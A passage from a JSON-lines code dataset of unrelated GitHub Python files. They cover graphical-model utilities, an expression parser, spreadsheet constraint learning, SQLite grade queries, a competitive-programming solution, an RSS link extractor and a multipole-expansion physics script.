f.cardinality, f.values)\n factors.append(newf)\n\n nodes = set([i for i in inputs])\n edges = set()\n factors = []\n add_data(u, '_1')\n add_data(v, '_2')\n\n result = MarkovNetwork(edges)\n result.add_factors(*factors)\n result.check_model()\n return result\n\n\ndef divide_mms(u, v):\n \"\"\"\n Divide a graphical model (Bayesian or Markov) by a MarkovNetwork (u / v)\n\n :param u: a `pgmpy.models.BayesianNetwork` or `pgmpy.models.MarkovNetwork`, the numerator\n :param v: a `pgmpy.models.MarkovNetwork`, the denominator\n :return: a `pgmpy.models.MarkovNetwork`\n \"\"\"\n\n assert isinstance(v, MarkovNetwork)\n if isinstance(u, BayesianNetwork):\n u = u.to_markov_model()\n else:\n u = copy.deepcopy(u)\n for n in v.nodes:\n u.add_node(n)\n for edge in v.edges:\n u.add_edge(edge[0], edge[1])\n u_factors = {frozenset(f.variables): f for f in u.factors}\n for f in v.factors:\n if frozenset(f.variables) in u_factors:\n zeros = np.where(u_factors[frozenset(f.variables)].values == 0)\n u_factors[frozenset(f.variables)].values /= f.values\n u_factors[frozenset(f.variables)].values[zeros] = 0\n else:\n fnew = copy.deepcopy(f)\n fnew.values = 1/fnew.values\n if isinstance(fnew.values, np.float64):\n if fnew.values == float('Inf'):\n fnew.values = 1e3\n else:\n fnew.values[fnew.values == float('Inf')] = 1e3\n u.add_factors(fnew)\n u.check_model()\n return u\n\n\ndef eliminate(m, to_keep=None, to_remove=None, output='network', heuristic='MinWeight'):\n \"\"\"\n Given an MRF, eliminate a set of nodes. This does not modify the original MRF\n\n :param m: a `pgmpy.models.MarkovNetwork`\n :param to_keep: a list of nodes to remove. Pass either this or `to_remove`\n :param to_remove: a list of nodes to remove. Pass either this or `to_keep`\n :param output: 'network' (default) or 'factor'\n :param heuristic: variable ordering heuristic. Currently supported are 'MinWeight' (default) and 'MinNeighbors'\n :return: a `pgmpy.models.MarkovNetwork` if `output` is 'network', `pgmpy.factors.discrete.DiscreteFactor` if it is 'factor'\n\n TODO: MinFill, MinWeight,\n \"\"\"\n\n if to_remove is None:\n to_remove = set(m.nodes).difference(set(to_keep))\n\n def cost(m, n, heuristic):\n if heuristic == 'MinNeighbors':\n return len(list(m.neighbors(n)))\n elif heuristic == 'MinWeight':\n return np.prod([m.get_cardinality(neighbor) for neighbor in m.neighbors(n)])\n else:\n raise ValueError\n\n if isinstance(m, BayesianNetwork):\n m = m.to_markov_model()\n else:\n m = m.copy()\n\n while len(to_remove) > 0:\n scores = {n: cost(m, n, heuristic) for n in to_remove}\n min_score_node = min(scores, key=scores.get)\n to_remove.remove(min_score_node)\n eliminate_variable(m, min_score_node)\n if output == 'network':\n return m\n else:\n f = full(m)\n f.values = f.values.transpose(*[f.variables.index(v) for v in to_keep])\n f.variables = to_keep\n return f\n\n\ndef add_function_node(b, outputs, function, label='function'):\n \"\"\"\n Modifies a Bayesian network in place by adding a new node that is a function of a few input nodes.\n\n This is useful to study functions of interest that are defined in terms of a number of nodes in the network.\n\n :param b: a `BayesianNetwork`\n :param outputs: a list of nodes that `function` will depend on\n :param function: a function that takes `outputs` as arguments and returns a scalar\n \"\"\"\n\n import inspect\n names = [b.get_cpds(output).state_names[output] for output in outputs]\n\n shape = [b.get_cardinality(output) for output in outputs]\n values = np.zeros(shape)\n idx = np.array(np.unravel_index(np.arange(np.prod(shape)), shape)).T\n for i in range(idx.shape[0]):\n values[tuple(idx[i, :])] = function(*[names[j][idx[i, j]] for j in range(idx.shape[1])])\n values = values.reshape(1, -1)\n cpd = pgmpy.factors.discrete.CPD.TabularCPD(label, 1, evidence=outputs, evidence_card=shape, values=values)\n b.add_node(node=label)\n for output in outputs:\n b.add_edge(output, label)\n b.add_cpds(cpd)\n\n\ndef to_mrf(b, output, values):\n \"\"\"\n Generate an MRF that encodes the expected value of an output node in a given BN. This\n is done by adding a new potential phi whose value for each O=o is o.\n\n :param b: A Bayesian network (pgmpy.models.BayesianNetwork)\n :param output: the target node\n :param values: a vector containing the values of variable `output`\n :return: an MRF (pgmpy.models.MarkovNetwork)\n \"\"\"\n\n assert output in b.nodes()\n assert 'output' not in b.nodes()\n\n m = b.to_markov_model()\n m.add_node('output')\n m.add_edge(output, 'output')\n m.add_factors(DiscreteFactor([output, 'output'], [m.get_cardinality(output), 1], np.array(values)[:, None]))\n m.check_model()\n return m\n","repo_name":"rballester/bnsobol","sub_path":"bnsobol/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8668,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"7311392959","text":"from .tokens import TokenType\nfrom .nodes import *\n\n# The idea of a parser is to parse a given set of tokens into a corresponding tree structure\n# in order to make it easier for the interpreter (next stage).\n# So for example the expression '2+3' should be parsed into:\n# (AddNode)\n# / \\\n# (NumberNode) (NumberNode)\n\n\nclass Parser:\n def __init__(self, tokens):\n self.tokens = iter(tokens)\n self.current_token = None\n self.advance()\n\n def raise_syntax_error(self):\n raise Exception(\"Invalid Syntax\")\n\n def advance(self):\n try:\n self.current_token = next(self.tokens)\n except StopIteration:\n self.current_token = None\n\n # Parsing a whole given set of tokens\n def parse(self):\n if self.current_token is None:\n return None\n\n result = self.expr()\n\n # current_token should be None after evaluating all tokens\n if self.current_token is not None:\n self.raise_syntax_error()\n\n return result\n\n # Search for the next expression e.g: '2+3' is a valid expression\n def expr(self):\n result = self.term()\n\n while self.current_token is not None and self.current_token.type in (TokenType.PLUS, TokenType.MINUS):\n if self.current_token.type == TokenType.PLUS:\n self.advance()\n result = AddNode(result, self.term())\n elif self.current_token.type == TokenType.MINUS:\n self.advance()\n result = SubtractNode(result, self.term())\n return result\n\n # Search for the next term e.g: '2*3' is a valid term\n def term(self):\n result = self.exp()\n\n while self.current_token is not None and \\\n self.current_token.type in (TokenType.MULTIPLY, TokenType.DIVIDE):\n if self.current_token.type == TokenType.MULTIPLY:\n self.advance()\n result = MultiplyNode(result, self.exp())\n elif self.current_token.type == TokenType.DIVIDE:\n self.advance()\n result = DivideNode(result, self.exp())\n return result\n\n # Exponent expression like x^3 has higher precedence than multiplication and division\n def exp(self):\n result = self.factor()\n\n while self.current_token is not None and self.current_token.type == TokenType.POWER:\n self.advance()\n result = PowerNode(result, self.factor())\n return result\n\n # Search for the next factor or unary operator\n def factor(self):\n token = self.current_token\n\n # Adding the precedence of the () parenthesis\n if token.type == TokenType.LEFT_PAREN:\n self.advance()\n result = self.expr()\n if self.current_token.type != TokenType.RIGHT_PAREN:\n self.raise_syntax_error()\n self.advance()\n return result\n\n if token.type == TokenType.NUMBER:\n self.advance()\n return NumberNode(token.value)\n elif token.type == TokenType.X:\n self.advance()\n return XNode()\n elif token.type == TokenType.PLUS:\n self.advance()\n return PlusNode(self.factor())\n elif token.type == TokenType.MINUS:\n self.advance()\n return MinusNode(self.factor())\n\n self.raise_syntax_error()\n","repo_name":"amirhesham65/function-plotter","sub_path":"interpreter/parser_.py","file_name":"parser_.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70031777917","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 20 17:02:20 2019\n\n@author: mohit\n\"\"\"\n\nimport helper\nimport numpy as np\nimport Example\nfrom openpyxl import load_workbook\nimport itertools as it\n\n\ndef getConstraintsForAll(dataTensor, variables, orderingNotImp):\n repeatDim = ()\n r = set([v for v in range(len(variables)) if v not in repeatDim])\n constraints = {}\n for l, (m, s) in enumerate(helper.split(r, (), repeatDim)):\n newset = m + s\n\n # this value will be used to filter max constraints\n maxPossible = 1\n for i in range(len(s)):\n maxPossible *= len(variables[s[i]])\n idTensor = helper.tensorIndicator(dataTensor, newset, variables)\n\n sumSet = range(len(m), len(newset))\n\n sumTensor_max, sumTensor_min = helper.tensorSum(\n idTensor, sumSet, np.array(variables)[list(newset)], 0\n )\n\n if len(set(s)) == 1 and len(set(orderingNotImp) & set(s)) == 0:\n (\n minConsZero,\n maxConsZero,\n minConsNonZero,\n maxConsNonZero,\n ) = helper.tensorConsZero(\n idTensor, sumSet, np.array(variables)[list(newset)]\n )\n else:\n minConsZero, maxConsZero, minConsNonZero, maxConsNonZero = (0, 0, 0, 0)\n row = {}\n row[\"minSum\"] = int(sumTensor_min) if sumTensor_min < maxPossible else 0\n row[\"maxSum\"] = int(sumTensor_max) if sumTensor_max < maxPossible else 0\n row[\"minConsZero\"] = int(minConsZero) if minConsZero < maxPossible else 0\n row[\"maxConsZero\"] = int(maxConsZero) if maxConsZero < maxPossible else 0\n row[\"minConsNonZero\"] = (\n int(minConsNonZero) if minConsNonZero < maxPossible else 0\n )\n row[\"maxConsNonZero\"] = (\n int(maxConsNonZero) if maxConsNonZero < maxPossible else 0\n )\n\n key = \",\".join([str(i) for i in m])\n key += \":\"\n key += \",\".join([str(i) for i in s])\n constraints[key] = row\n\n return constraints\n\n\ndef get_data(filename, sheet, data_range, variables):\n output = np.zeros([len(variables[0]), len(variables[1]), len(variables[2])])\n x_mapping = np.zeros(\n [len(variables[0]), len(variables[1]), len(variables[2])]\n ).astype(int)\n y_mapping = np.zeros(\n [len(variables[0]), len(variables[1]), len(variables[2])]\n ).astype(int)\n wb = load_workbook(filename=filename, read_only=True)\n ws = wb[sheet]\n data = []\n indices = []\n tmp = data_range.coord.split(\":\")\n for i, row in enumerate(ws[tmp[0] : tmp[1]]):\n for j, cell in enumerate(row):\n data.append(cell.value)\n indices.append([cell.row - 1, cell.column - 1])\n\n for i, element in enumerate(it.product(*variables)):\n index = ()\n for j, el in enumerate(element):\n index = index + (variables[j].index(el),)\n output[index] = data[i]\n x_mapping[index] = indices[i][0]\n y_mapping[index] = indices[i][1]\n # print(x_mapping,y_mapping)\n return output, x_mapping, y_mapping\n\n\ndef learnConstraints(filename, sheet, data_ranges):\n constraints = []\n variables = []\n for data_range in data_ranges:\n ex = Example.Example(filename, sheet, data_range)\n dataTensor, variables = ex.get_dimensions_and_data()\n dataTensor = dataTensor.transpose((1, 2, 0))\n variables = [variables[1], variables[2], variables[0]]\n\n lenVar = []\n for i in range(len(variables)):\n lenVar.append(len(variables[i]))\n orderingNotImp = [0]\n constraints.append(getConstraintsForAll(dataTensor, variables, orderingNotImp))\n # print(constraints)\n return constraints, [variables[2], variables[0], variables[1]]\n\n\n# return np.matrix([list(val.values()) for val in constraints.values()]),variables\n\n# if __name__ == \"__main__\":\n# constraints,var = learnConstraints(\"data.xlsx\",\"sheet1\",[\"B1:V1\",\"B2:V2\"],[\"A3:A14\"],\"B3:V14\")\n# partial_sol,index_mapping=get_data(\"sol.xlsx\",\"sheet1\", \"B3:V14\",var)\n## print(partial_sol)\n# generatesSample(len(var[1]),len(var[2]),len(var[0]),1,constraints,partial_sol,\"\")\n","repo_name":"116014/countOR","sub_path":"learner.py","file_name":"learner.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"2367511991","text":"import sqlite3\nfrom tokenize import Name\n\n# connect to databse\nconn = sqlite3.connect('grades.db')\n\n# create a cursor\nc = conn.cursor()\n\n# query values from database\nc.execute(\"\"\"SELECT * FROM waec_scores\"\"\")\n\nrows = c.fetchall()\n\n# print(type(rows))\n\n# program to determine student with highest score in maths\ndef max_math():\n c.execute(\"\"\"SELECT Name, MAX(Maths) FROM waec_scores\"\"\")\n \n rows = c.fetchall()\n for rows in rows:\n Name, Maths = rows\n print(f\" The student with the highest score in Maths is {Name} with {Maths} score. \\n\"f\"{'.'*70}\")\n # print()\nmax_math()\n\n# program to determine the student with the lowest score in English\ndef min_english():\n c.execute(\"\"\"SELECT Name, MIN(English) FROM waec_scores\"\"\")\n \n rows = c.fetchall()\n for rows in rows:\n Name, English = rows\n print(f\" The student with the least score in English is {Name} with {English} score. \\n\"f\"{'.'*70}\")\n\nmin_english()\n\n# program to determine the average student in Maths\ndef avg_english():\n c.execute(\"\"\"SELECT Name, AVG(English) FROM waec_scores\"\"\")\n \n rows = c.fetchall()\n for rows in rows:\n Name, English = rows\n print(f\" The student with the average score in English is {Name} with {English} score \\n\"f\"{'.'*70}\")\n\navg_english()\n \n# program to determine the average student in English\ndef avg_maths():\n c.execute(\"\"\"SELECT Name, AVG(Maths) FROM waec_scores\"\"\")\n \n rows = c.fetchall()\n for rows in rows:\n Name, Maths = rows\n print(f\" The student with the average score in Maths is {Name} with {Maths} score \\n\"f\"{'.'*70}\")\n\navg_maths()\n\n# program to determine the best performing student across all subjects\ndef best_student():\n c.execute(\"\"\"SELECT Name,\n SUM(Maths+English+Basic_science+Agri_science+Language+Economics+Physics+Chemistry+Literature) AS Total_score\n FROM waec_scores\n GROUP BY Name\n ORDER BY total_score DESC\n LIMIT 1\n \"\"\")\n \n rows = c.fetchall()\n for rows in rows:\n Name, Total_score = rows\n print(f\" The overall best student is {Name} with {Total_score} score \\n\"f\"{'.'*70}\")\n\nbest_student()\n\n# program to determine the overall avergae student\ndef avg_best_student():\n c.execute(\"\"\"SELECT Name,\n AVG(Maths+English+Basic_science+Agri_science+Language+Economics+Physics+Chemistry+Literature) AS Avg_score\n FROM waec_scores\n GROUP BY Name\n ORDER BY Avg_score DESC\n LIMIT 1 \n \"\"\")\n\n rows = c.fetchall()\n for rows in rows:\n Name, Avg_score = rows\n print(f\" The overall average best student is {Name} with {Avg_score} score \\n\"f\"{'.'*70}\")\n\navg_best_student()","repo_name":"Teriekarie/DSCI_SGA","sub_path":"ASSIGNMENT/Module5/query_waec.py","file_name":"query_waec.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"33187382641","text":"# https://www.luogu.com.cn/problem/T125728?contestId=27163\n# https://www.luogu.com.cn/blog/12cow/SBCOI2020\n\n# import sys, heapq\n# from collections import *\n# from functools import lru_cache\n# sys.setrecursionlimit(10**6)\n\n\n# @lru_cache(None)\n# def em(mm, aa, bb):\n# if mm == aa+bb: res = 0\n# elif aa+bb == 0: return 1\n# else: res = (em(mm-1,aa,bb)+od(mm-1,aa,bb)+ev(mm-1,aa,bb))%Mod\n# # print(0, mm,aa,bb,res)\n# return res\n\n# @lru_cache(None)\n# def od(mm, aa, bb):\n# if aa == 0: res = 0\n# elif mm == aa+bb: res = 1 if bb == 0 else 0\n# else: res = (em(mm-1,aa-1,bb)+od(mm-1,aa-1,bb))%Mod\n# # print(1, mm, aa, bb, res)\n# return res\n\n# @lru_cache(None)\n# def ev(mm, aa, bb):\n# if bb == 0: res = 0\n# elif mm == aa+bb: res = 1\n# else: res = (em(mm-1,aa,bb-1)+od(mm-1,aa,bb-1)+ev(mm-1,aa,bb-1))%Mod\n# # print(2, mm, aa, bb, res)\n# return res\n\n\n\n# # sys.stdin = open('input.txt', 'r')\n# t = input()\n# t = int(t)\n# Mod = 998244353\n# for _ in range(t):\n# m, a, b = map(int, input().split(' '))\n# print((em(m,a,b)+od(m,a,b)+ev(m,a,b))%Mod)\n\n\nimport sys, heapq\nfrom collections import *\nfrom functools import lru_cache\nsys.setrecursionlimit(10**8)\n\n\n\ndef main():\n @lru_cache(None)\n def dfs(mm, aa, bb):\n # print(mm,aa,bb)\n if mm == aa + bb:\n res = 1\n elif aa + bb == 0:\n res = 1\n elif aa == 0:\n res = (dfs(mm - 1, 0, bb) + dfs(mm - 1, 0, bb - 1)) % Mod\n elif bb == 0:\n res = (dfs(mm - 1, aa, 0) + dfs(mm - 1, aa - 1, 0)) % Mod\n else:\n res = (dfs(mm - 1, aa, bb) + dfs(mm - 1, aa, bb - 1) + dfs(mm - 1, aa - 1, bb) - dfs(mm - 2, aa - 1,\n bb - 1)) % Mod\n # print('**', mm,aa,bb,res)\n return res\n\n sys.stdin = open('input.txt', 'r')\n t = int(input())\n dfs(100,100,100)\n Mod = 998244353\n for _ in range(t):\n m, a, b = map(int, input().split(' '))\n print(dfs(m, a, b))\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"zhenfelix/OnlineJudgeCodings","sub_path":"luogu/T125728 [SBCOI2020]人.py","file_name":"T125728 [SBCOI2020]人.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20550139187","text":"'''\nCreated on Apr 10, 2010\n\n@author: hammer\n'''\nimport urllib2\nfrom BeautifulSoup import BeautifulSoup\n\nclass RSSFeedExtractor(object):\n __link = None\n \n def getFeedURL(self):\n return self.__link\n\n def __init__(self, url):\n html = urllib2.urlopen(url.strip())\n soup = BeautifulSoup(html)\n \n res = soup.findAll('link', rel='alternate', attrs={'type': re.compile(\"^application/(atom|rss)\\+xml\")})\n if len(res) == 0:\n #print \"Couldn't find the Feed!\"\n continue\n \n href = res[0]['href']\n \n # relative link?\n if not href.startswith(\"http\"):\n self.__link = urljoin(url, href)\n else:\n self.__link = href","repo_name":"claudiomartella/WheresTheJuice","sub_path":"bins/RSSFeedExtractor.py","file_name":"RSSFeedExtractor.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"70023095676","text":"# import modules\nimport numpy as np\n\nimport scipy as sc\nfrom scipy import misc\nfrom scipy import special\n\nimport matplotlib\nimport matplotlib.cm as cm\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\n\n# Note: this transforms A to B\ndef DCM(theta):\n C = np.array([[np.cos(theta), -np.sin(theta), 0],\n [np.sin(theta), np.cos(theta), 0],\n [0, 0, 1]])\n return C\n\n\n# function that converts cartesian coordinates to pherical\ndef cart_to_sph(r):\n \"\"\"\n Converts from cartesian coords to spherical\n inputs: \n r_c - matrix of cartesian particle coordinates, r_c[i] = [xi yi zi]\n r_sph - martis of spherical particle cooridnates, r_sph[i] = [rho_i alpha_i beta_i]\n \"\"\"\n # Define this quantity since it is used multiple times\n r01 = r[:,0]**2 + r[:,1]**2\n \n # initialize the new vector \n r_sph = np.empty(r.shape)\n \n # compute new vector quantities\n r_sph[:,0] = np.sqrt(r01 + r[:,2]**2)\n r_sph[:,1] = np.arctan2(np.sqrt(r01), r[:,2]) # for elevation angle defined from Z-axis down\n r_sph[:,2] = np.arctan2(r[:,1], r[:,0])\n \n # return new spherical coords dictionary\n r_sph = [dict(zip(['rho','alpha','beta'], r)) for r in r_sph]\n return r_sph\n\n\n# compute spherical harmonics using semi-normalized formula\ndef my_sph(m,n,theta,phi):\n x = np.cos(theta)\n C = np.sqrt(sc.misc.factorial(n-np.abs(m))/sc.misc.factorial(n+np.abs(m)))\n Pmn = (-1)**np.abs(m)*(1-x**2)**(np.abs(m)/2)*sc.special.eval_legendre((n-np.abs(m)), x)\n Ymn = C*Pmn*sc.exp(1j*m*phi)\n return Ymn\n\n\nclass ChargedBody:\n \"\"\"\n This is the class that contains the charge properties of a body\n inputs: \n q - list of the value of charge for the body\n q_coords - list of x and y coords\n iD - number of the body\n \"\"\"\n # Initialize instance\n def __init__(self, q, q_coords, iD):\n self.q = q\n self.iD = iD\n self.num_q = len(q)\n self.q_coords = q_coords\n \n def __repr__(self):\n \"\"\"\n Defines the print method\n \"\"\"\n return \"Body - \" + repr(self.iD) + \"\\n\" + \\\n \"N_charges = \" + repr(self.num_q) + \"\\n\" + \\\n \"Charge values = \" + repr(self.q) + \"\\n\" + \\\n \"Charge coords = \" + \"\\n\" + repr(self.q_coords) + \"\\n\"\n \n def mul_exp(self,p):\n \"\"\"\n This function computes the multipole expansions for the componentwise force computation\n inputs:\n m - degree of the expansion\n n - order of the expansion\n \"\"\"\n self.p = p\n self.M = np.array([[np.sum([q * qc['rho'] **(n) * my_sph(-m, n, qc['alpha'], qc['beta']) \n for q,qc in zip(self.q,self.q_coords)]) \n for m in range(-n,n+1)] for n in range(self.p+1)])\n \n def rotate(self, theta, alpha, beta, gamma):\n \"\"\"\n Performs the rigid body rotation of the inertial properties and the rotation of \n the multipole expansions\n inputs: \n theta - angle for the kinematic rotations \n ** not implemented yet (not needed at this time)\n \"\"\"\n # initialze arrays with zeros\n C = np.zeros(3)\n d = [[[0.0+1j*0 for m in range(-n,n+1)] for mp in range(-n,n+1)] for n in range(self.p+1)]\n Mp = [[0.0+1j*0 for m in range(-n,n+1)] for n in range(self.p+1)]\n \n # also set to zeros\n D = d\n \n # d[0][0][0] and D[0][0][0] are known \n d[0][0][0] = 1\n D[0][0][0] = 1\n\n Mp[0][0] = self.M[0][0]\n\n # recursive computation of terms of d and D matricies\n for n in range(1,self.p+1):\n for mp in range(-n,n+1):\n for m in range(-n,n+1):\n if mp < -(n-1):\n C[0] = np.sin(beta/2)**2*np.sqrt((n+m)*(n+m-1)/((n-mp)*(n-mp-1)))\n C[1] = 2*np.sin(beta/2)*np.cos(beta/2) \\\n *np.sqrt((n+m)*(n-m)/((n-mp)*(n-mp-1)))\n C[2] = np.cos(beta/2)**2*np.sqrt((n-m)*(n-m-1)/((n-mp)*(n-mp-1)))\n d[n][mp+n][m+n] = np.sum([C[i-m+1]*d[n-1][mp+1+(n-1)][i+(n-1)] \n for i in range(np.max([m-1,-(n-1)]), np.min([m+1,n-1])+1)])\n elif mp > (n-1):\n C[0] = np.cos(beta/2)**2*np.sqrt((n+m)*(n+m-1)/((n+mp)*(n+mp-1)))\n C[1] = -2*np.sin(beta/2)*np.cos(beta/2) \\\n *np.sqrt((n+m)*(n-m)/((n+mp)*(n+mp-1)))\n C[2] = np.sin(beta/2)**2*np.sqrt((n-m)*(n-m-1)/((n+mp)*(n+mp-1)))\n d[n][mp+n][m+n] = np.sum([C[i-m+1]*d[n-1][mp-1+(n-1)][i+(n-1)] \n for i in range(np.max([m-1,-(n-1)]), np.min([m+1,n-1])+1)])\n else:\n C[0] = np.sin(beta/2)*np.cos(beta/2) \\\n *np.sqrt((n+m)*(n+m-1)/((n+mp)*(n-mp)))\n C[1] = (np.cos(beta/2)**2-np.sin(beta/2))*np.sqrt((n-m)*(n+m)/((n-mp)))\n C[2] = -np.sin(beta/2)*np.cos(beta/2) \\\n *np.sqrt((n-m)*(n-m+1)/((n-mp)*(n+mp)))\n d[n][mp+n][m+n] = np.sum([C[i-m+1]*d[n-1][mp+(n-1)][i+(n-1)] \n for i in range(np.max([m-1,-(n-1)]), np.min([m+1,n-1])+1)])\n D[n][mp+n][m+n] = np.exp(1j*m*gamma)*d[n][mp+n][m+n]*np.exp(1j*m*alpha)\n Mp[n][mp+n] = np.dot(D[n][mp+n],self.M[n])\n self.M = Mp\n \n def potential(self, rp):\n \"\"\"\n This function computes the couloumb potential due to a charged body at a \n particluar point in space.\n inputs:\n loc - spherical coordinates of the point of interest\n outputs:\n Phi - potential\n \"\"\"\n rp = rp[0]\n Phi = np.sum([np.sum([self.M[n][m+n]/rp['rho']**(n+1)\n *my_sph(m, n, rp['alpha'], rp['beta']) \n for m in range(-n,n+1)]) for n in range(self.p+1)])\n# [[print('M[',n,'][',m+n,']= ',\"{0:.3f}\".format(self.M[n][m+n]),\n# 'rp^n = ',\"{0:.3f}\".format(rp['rho']**(n+1)),\n# 'Y(theta,phi) = ',\"{0:.3f}\".format(my_sph(m, n, rp['alpha'], rp['beta']))) \n# for m in range(-n,n+1)] for n in range(self.p+1)]\n# [print('Phi[',n,'] = ', \"{0:.3f}\".format(np.sum([self.M[n][m+n]/rp['rho']**(n+1)*my_sph(m, n, rp['alpha'], rp['beta']) \n# for m in range(-n,n+1)]))) for n in range(self.p+1)]\n return Phi\n\n# <codecell>\n\ndef example(zeta,d,p):\n # Describe system \n # Characteristic length \n a = 1\n\n # charge values [O H H]\n q = [-1, 1]\n\n # location of charges w.r.t origin\n roq = np.array([[-a/2, 0, 0],\n [ a/2, 0, 0]])\n \n # Define test point\n rcq_p = np.array([0, -d, 0])\n\n\n # Compute the center of charge and locate particles w.r.t. center of charge\n rocq = np.sum([abs(q)*r for q,r in zip(q,roq)],0)/np.sum(np.abs(q))\n rcq_q = np.array([rq - rocq for rq in roq])\n # print(rocq)\n # print()\n # print(rcq_q)\n\n # array of rotation increments\n angle = np.array([0, zeta])\n\n # dipole orientation 'A'\n rcq_qa = rcq_q\n\n # Create system 'B' by rotating system 'A'\n CAB = DCM(angle[1])\n rcq_qbT = np.dot(CAB,rcq_qa.T)\n rcq_qb = rcq_qbT.T\n\n # Transform coordinates of point of interest\n rcq_p_sph = cart_to_sph(np.array([rcq_p]))\n\n # Transform coordinates of charge locations\n rcq_qa_sph = cart_to_sph(rcq_qa)\n rcq_qb_sph = cart_to_sph(rcq_qb)\n\n # Create a charged body for system A\n bodyA = ChargedBody(q, rcq_qa_sph, 1)\n bodyB = ChargedBody(q, rcq_qb_sph, 2)\n\n # Form Multipole Expansions\n bodyA.mul_exp(p)\n bodyB.mul_exp(p)\n\n # Evaluate Potential at a point [r theta phi]\n# PhiA = bodyA.potential(rcq_p_sph)\n PhiB = bodyB.potential(rcq_p_sph)\n PhiB = PhiB.real\n# print(\"Potential (via M.E.) of System B at point 'p' = \",PhiB.real)\n\n # Compute the exact solution \n VB = np.sum([qb/np.linalg.norm(-rcq_p + r) for qb,r in zip(q,rcq_qb)])\n# print(\"Potential (exact) of System A at point 'p' = \",VA)\n# print(\"Potential (exact) of System B at point 'p' = \",VB)\n\n # Perform a rotation on System A so that it is the same configuration as B \n alpha = -zeta\n beta = 0\n gamma = 0\n bodyA.rotate(0, alpha, beta, gamma)\n\n # Evaluate potential of 'A' at 'B'\n PhiA_B = bodyA.potential(rcq_p_sph)\n PHiA_B = PhiA_B.real\n \n # Compute the error bound\n rr = np.linalg.norm(rcq_p)\n # [print('rho = ',r['rho']) for r in rcq_qb_sph]\n aa = np.max([rq['rho'] for rq in rcq_qb_sph])\n # print('a = ',a)\n Q = np.sum(np.abs(q))\n # print('Q = ',Q)\n # print('r - a = ',r - a)\n # print('a/r = ',a/r)\n # bound = Q/(rr-aa)*(aa/rr)**(p+1)/np.abs(VB)*100\n bound = Q/(rr-aa)*(aa/rr)**(p+1)\n return VB, PhiB, PhiA_B, bound\n\n# <markdowncell>\n\n# ### Try theta = 5 to 355 degrees and R/L = 1 to 10\n\n# <codecell>\n\np = 3\n# Terms in multipole exansion \n\n# Number of data points in range\nn_points = 20\n\n# Create variable arrays\ntheta = np.linspace(0,2*np.pi,n_points)\ndist = np.linspace(.6,2.5,n_points)\n\n# Evaluate Error in List Comprehension\nresults = np.array([[example(zeta,d,p) \\\n for d in dist] for zeta in theta])\n# for zeta in theta] for d in dist]);\n\nVB = results[:,:,0].real\nPhiB = results[:,:,1].real\nPhiA_B = results[:,:,2].real\nbound = results[:,:,3].real\nVB_rms = np.sqrt(1/VB.size*np.linalg.norm(VB)**2)\nprint(VB_rms)\n\n# Compute error and print results\n# error_exact = np.abs((VB - PhiA_B))\nerror_exact = np.abs((VB - PhiA_B))/VB_rms*100\nerror_rot = np.abs((PhiB - PhiA_B))/VB_rms*100\nbound = bound/VB_rms*100\n\n# print(\"Potential (via M.E.) of System A rot to B evaluated at point 'p' = \",PhiA_B.real)\n# print(\"% Error compared to exact = \",\"{0:.3f}\".format(error_exact.real),'%')\n# print(\"% Error bound = \",\"{0:.3f}\".format(bound),'%')\n# print(\"% Error compared to potential using M.E. of 'B' = \",\"{0:.3f}\".format(error_rot.real),'%')\n\n# <codecell>\n\n# Plot the results\n\nplt.close('all')\n\nR = (dist - 0.5)/1.0\n\nlevels = np.linspace(0,20,10)\n\nplt.close('all')\nplt.figure(figsize=(10, 8))\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\n# Plot the error vs. exact\nfig = plt.figure(figsize=(10, 8))\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\nlevels = np.linspace(0,20,10)\nCS = plt.contourf(R, theta*180/np.pi, error_exact, levels)\nCB = plt.colorbar(CS, extend='both')\nplt.title('Error vs Exact')\nplt.xlabel(r'$\\frac{R}{L}$')\nplt.ylabel(r'Rotation Angle $\\left(\\theta\\right)$')\nplt.savefig('ErrorExact.pdf')\n# plt.show()\n\n# Plot the error vs. multipole\nfig = plt.figure(figsize=(10, 8))\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\nlevels = np.linspace(0,20,10)\nCS = plt.contourf(R, theta*180/np.pi, error_rot, levels)\nCB = plt.colorbar(CS, extend='both')\nplt.title(r'Error vs Multipole')\nplt.xlabel(r'$\\frac{R}{L}$')\nplt.ylabel(r'Rotation Angle $\\left(\\theta\\right)$')\nplt.savefig('ErrorMultipole.pdf')\n# plt.show()\n\n\n# plt.subplot(2, 1, 1)\n# plt.contourf(R, theta*180/np.pi, error_exact, levels)\n# plt.title(r'Percent Error v.s. Exact')\n# plt.ylabel(r'Rotation Angle $\\left(\\theta\\right)')\n\n# plt.subplot(2, 1, 2)\n# plt.contourf(R, theta*180/np.pi, error_rot, levels)\n# plt.title(r'Percent Error v.s. Direct Spatial Multipole')\n# plt.xlabel(r'$\\frac{R}{L}$')\n# plt.ylabel(r'Rotation Angle $\\left(\\theta\\right)')\n\n# plt.savefig('ErrorSubplot.pdf')\n# plt.show()\n\n# # Two subplots, the axes array is 1-d\n# fig, axarr = plt.subplots(2, sharex=True)\n# axarr[0].contourf(R, theta*180/np.pi, error_exact, levels)\n# axarr[0].set_title(r'Percent Error v.s. Exact')\n# axarr[1].contourf(R, theta*180/np.pi, error_rot, levels)\n# axarr[1].set_title(r'Percent Error v.s. Direct')\n\n# # Plot the error bound\n# plt.figure()\n# levels = np.linspace(0,20,10)\n# CS = plt.contourf(R, theta*180/np.pi, bound, levels)\n# # plt.clabel(CS, inline=1, fontsize=10)\n# # make 